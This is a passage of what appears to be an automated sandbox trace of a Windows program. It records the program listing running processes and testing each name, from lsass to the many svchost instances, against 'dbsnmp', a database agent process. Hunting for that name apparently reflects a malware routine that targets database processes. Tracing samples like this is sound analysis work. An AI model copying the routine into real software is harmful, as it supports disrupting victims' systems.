returned 0x3543a30 [0092.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3543a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0092.869] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0092.869] StrStrIA (lpFirst="csrss.exe", lpSrch="dbsnmp") returned 0x0 [0092.869] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0092.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.870] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3543a78 [0092.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3543a78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0092.870] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0092.870] StrStrIA (lpFirst="winlogon.exe", lpSrch="dbsnmp") returned 0x0 [0092.870] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0092.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.871] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3543b08 [0092.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3543b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0092.871] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0092.871] StrStrIA (lpFirst="services.exe", lpSrch="dbsnmp") returned 0x0 [0092.871] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0092.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.872] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3543b20 [0092.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3543b20, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0092.872] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0092.872] StrStrIA (lpFirst="lsass.exe", lpSrch="dbsnmp") returned 0x0 [0092.872] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.873] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543b38 [0092.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3543b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.873] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.873] StrStrIA (lpFirst="svchost.exe", lpSrch="dbsnmp") returned 0x0 [0092.873] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0092.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.874] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3543b68 [0092.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3543b68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0092.874] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0092.874] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="dbsnmp") returned 0x0 [0092.874] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0092.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.875] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35439a0 [0092.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35439a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0092.875] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0092.875] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="dbsnmp") returned 0x0 [0092.875] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.876] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35438c8 [0092.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35438c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.876] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.877] StrStrIA (lpFirst="svchost.exe", lpSrch="dbsnmp") returned 0x0 [0092.877] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0092.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0092.878] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35477c8 [0092.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x35477c8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0092.878] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0092.878] StrStrIA (lpFirst="dwm.exe", lpSrch="dbsnmp") returned 0x0 [0092.878] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x60, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.879] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35439b8 [0092.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35439b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.880] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.880] StrStrIA (lpFirst="svchost.exe", lpSrch="dbsnmp") returned 0x0 [0092.880] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.881] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35439d0 [0092.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35439d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.881] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.881] StrStrIA (lpFirst="svchost.exe", lpSrch="dbsnmp") returned 0x0 [0092.881] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.882] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543940 [0092.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3543940, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.882] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.882] StrStrIA (lpFirst="svchost.exe", lpSrch="dbsnmp") returned 0x0 [0092.882] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.884] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543a00 [0092.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3543a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.884] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.884] StrStrIA (lpFirst="svchost.exe", lpSrch="dbsnmp") returned 0x0 [0092.884] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.885] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543a48 [0092.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3543a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.885] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.885] StrStrIA (lpFirst="svchost.exe", lpSrch="dbsnmp") returned 0x0 [0092.885] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.887] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543e68 [0092.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3543e68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.887] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.887] StrStrIA (lpFirst="svchost.exe", lpSrch="dbsnmp") returned 0x0 [0092.887] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.888] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543da8 [0092.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3543da8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.888] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.888] StrStrIA (lpFirst="svchost.exe", lpSrch="dbsnmp") returned 0x0 [0092.888] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.889] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543d48 [0092.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3543d48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.889] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.889] StrStrIA (lpFirst="svchost.exe", lpSrch="dbsnmp") returned 0x0 [0092.889] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.890] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543e08 [0092.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3543e08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.890] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.890] StrStrIA (lpFirst="svchost.exe", lpSrch="dbsnmp") returned 0x0 [0092.890] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.891] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543d00 [0092.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3543d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.892] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.892] StrStrIA (lpFirst="svchost.exe", lpSrch="dbsnmp") returned 0x0 [0092.892] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0092.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.893] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543e38 [0092.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3543e38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0092.893] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0092.893] StrStrIA (lpFirst="spoolsv.exe", lpSrch="dbsnmp") returned 0x0 [0092.893] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.894] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543e80 [0092.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3543e80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.894] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.894] StrStrIA (lpFirst="svchost.exe", lpSrch="dbsnmp") returned 0x0 [0092.894] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0092.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.895] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543e50 [0092.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3543e50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0092.895] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0092.895] StrStrIA (lpFirst="audiodg.exe", lpSrch="dbsnmp") returned 0x0 [0092.895] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0092.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.896] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3543cb8 [0092.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3543cb8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0092.896] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0092.896] StrStrIA (lpFirst="sihost.exe", lpSrch="dbsnmp") returned 0x0 [0092.896] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.897] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543e98 [0092.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3543e98, cbMultiByte=12, 